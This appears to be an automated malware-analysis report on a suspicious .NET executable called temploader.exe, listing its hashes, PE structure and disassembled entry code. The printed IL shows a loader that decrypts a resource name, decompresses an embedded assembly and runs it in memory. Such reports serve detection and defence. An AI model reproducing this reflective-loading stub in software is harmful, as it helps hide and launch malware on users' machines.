Suspicious
Suspect

bb5867fd9a72c96717ecae61e75e426c

PE Executable | MD5: bb5867fd9a72c96717ecae61e75e426c | Size: 1.55 MB | application/x-dosexec


Characteristics

Symbol Obfuscation Score: Medium

Hash | Hash Value
MD5 | bb5867fd9a72c96717ecae61e75e426c
Sha1 | 4c61c08e4d5f1ae192920bcfffbd6976345ec07a
Sha256 | f66a4ee15f672bbf9259027eb286f369bfa81a3aa979f547415b831d22d031b5
Sha384 | b819725931be56874954411065452a7a0c594f59ea5b69c7a2f9023bfbc4f6b2155cbc06368ee218d7c41bcd04681a8f
Sha512 | 6d00bce15c2ee0b136f4f78c9f21049641413d6dce3baf2d582c22105fbc8cc803af481c294ddffecde558647f396ca66a01c5a4ccea47d7d10d473aa404cef7
SSDeep | 24576:67/IRl0i+euB1tRwbyRNHZXva9fcZq0CQkaTAfVq05pmT1W5kaSa0csy49LnA3/B:lRl8RtRbFE0CQ7TIVUBW5Qamy4tAvI6
TLSH | 94753327E16918C3D2109DBB8D1DD5C9283B769B22DFDEB575A12EF65E800242CEF60C

PeID: Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL

File Structure
Structure
  DosHeader
  PE Header
  Optional Header (x86)
  Section Headers
    .text
    .rsrc
    .reloc
  Resources
    RT_VERSION
      ID:0001
        ID:0
    RT_MANIFEST
      ID:0001
        ID:0
  .Net Resources
    a

Information
Name | Value
Info | PE Detect: PeReader OK (file layout)
Module Name | temploader.exe
Full Name | temploader.exe
EntryPoint | System.Void a.a::Main()
Scope Name | temploader.exe
Scope Type | ModuleDef
Kind | Windows
Runtime Version | v4.0.30319
Tables Header Version | 512
WinMD Version | <null>
Assembly Name | temploader
Assembly Version | 0.0.0.0
Assembly Culture | <null>
Has PublicKey | False
PublicKey Token | <null>
Target Framework | <null>
Total Strings | 3
Main Method | System.Void a.a::Main()
Main IL Instruction Count | 37
Main IL |
    call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly()
    ldstr WrgCr77Rz1wYMcvScheNgQ==
    ldstr v8H0mJxMg+dMI12z6rkjE7GLmTC11gWQVhBWpJ7SeVY=
    ldstr 50R07FlUfAM7cxEDrWJsLQ==
    call System.String 鍑橈柍⬺鰍៾�痎::埥I⤔䔘࿸蚎쭦摗(System.String,System.String,System.String)
    callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String)
    stloc.0
    newobj System.Void System.IO.MemoryStream::.ctor()
    stloc.1
    ldloc.0
    ldc.i4.0
    newobj System.Void System.IO.Compression.DeflateStream::.ctor(System.IO.Stream,System.IO.Compression.CompressionMode)
    stloc.2
    ldloc.2
    ldloc.1
    callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream)
    leave IL_0046: ldloc.1
    ldloc.2
    brfalse IL_0045: endfinally
    ldloc.2
    callvirt System.Void System.IDisposable::Dispose()
    endfinally
    ldloc.1
    callvirt System.Byte[] System.IO.MemoryStream::ToArray()
    call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint()
    ldnull
    ldnull
    callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[])
    pop
    leave IL_0070: ret
    ldloc.0
    brfalse IL_006F: endfinally
    ldloc.0
    callvirt System.Void System.IDisposable::Dispose()
    endfinally
    ret
